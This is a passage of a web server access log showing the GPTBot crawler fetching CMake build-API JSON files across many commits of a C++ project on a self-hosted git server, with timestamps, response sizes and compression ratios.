+0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=rendered" [Client 74.7.227.38] [Length 11160] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:19:48:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=rendered" [Client 74.7.227.38] [Length 11149] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:19:48:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=rendered" [Client 74.7.227.38] [Length 11155] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:19:48:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=source" [Client 74.7.227.38] [Length 13748] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:19:48:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json?display=source" [Client 74.7.227.38] [Length 12874] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" +[17/Feb/2026:19:48:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=rendered" [Client 74.7.227.38] [Length 11124] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:19:48:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=rendered" [Client 74.7.227.38] [Length 11162] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:19:48:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json?display=rendered" [Client 74.7.227.38] [Length 11154] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" +[17/Feb/2026:19:48:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=rendered" [Client 74.7.227.38] [Length 11152] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:19:48:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=rendered" [Client 74.7.227.38] [Length 11154] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:19:48:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=rendered" [Client 74.7.227.38] [Length 11151] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:19:48:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=rendered" [Client 74.7.227.38] [Length 11148] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:19:48:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=source" [Client 74.7.227.38] [Length 13623] [Gzip 4.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:19:48:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=source" [Client 74.7.227.38] [Length 35757] [Gzip 10.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:19:48:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=rendered" [Client 74.7.227.38] [Length 11155] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:19:48:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=source" [Client 74.7.227.38] [Length 13748] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:19:48:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=rendered" [Client 74.7.227.38] [Length 11154] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:19:48:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=source" [Client 74.7.227.38] [Length 12791] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:19:48:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=source" [Client 74.7.227.38] [Length 12793] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:19:48:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=source" [Client 74.7.227.38] [Length 35750] [Gzip 10.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:19:48:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=rendered" [Client 74.7.227.38] [Length 11149] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:19:48:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json?display=source" [Client 74.7.227.38] [Length 19998] [Gzip 9.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" +[17/Feb/2026:19:48:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=source" [Client 74.7.227.38] [Length 12764] [Gzip 4.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:19:48:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=source" [Client 74.7.227.38] [Length 13622] [Gzip 4.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:19:48:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=source" [Client 74.7.227.38] [Length 12792] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:19:48:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=source" [Client 74.7.227.38] [Length 13747] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:19:48:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=source" [Client 74.7.227.38] [Length 35752] [Gzip 10.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:19:48:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=source" [Client 74.7.227.38] [Length 12796] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:19:48:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json?display=rendered" [Client 74.7.227.38] [Length 11132] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" +[17/Feb/2026:19:48:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=source" [Client 74.7.227.38] [Length 13750] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:19:48:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=rendered" [Client 74.7.227.38] [Length 11152] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:19:48:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=rendered" [Client 74.7.227.38] [Length 11130] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:19:48:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=rendered" [Client 74.7.227.38] [Length 11154] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:19:48:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=source" [Client 74.7.227.38] [Length 13624] [Gzip 4.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:19:48:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=rendered" [Client 74.7.227.38] [Length 11148] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:19:48:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json?display=source" [Client 74.7.227.38] [Length 12871] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" +[17/Feb/2026:19:48:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=source" [Client 74.7.227.38] [Length 13745] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:19:48:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=rendered" [Client 74.7.227.38] [Length 11152] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:19:48:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=source" [Client 74.7.227.38] [Length 13749] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:19:48:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=rendered" [Client 74.7.227.38] [Length 11152] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:19:48:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=source" [Client 74.7.227.38] [Length 13622] [Gzip 4.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:19:48:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=source" [Client 74.7.227.38] [Length 13748] [Gzip 4.69] [Sent-to 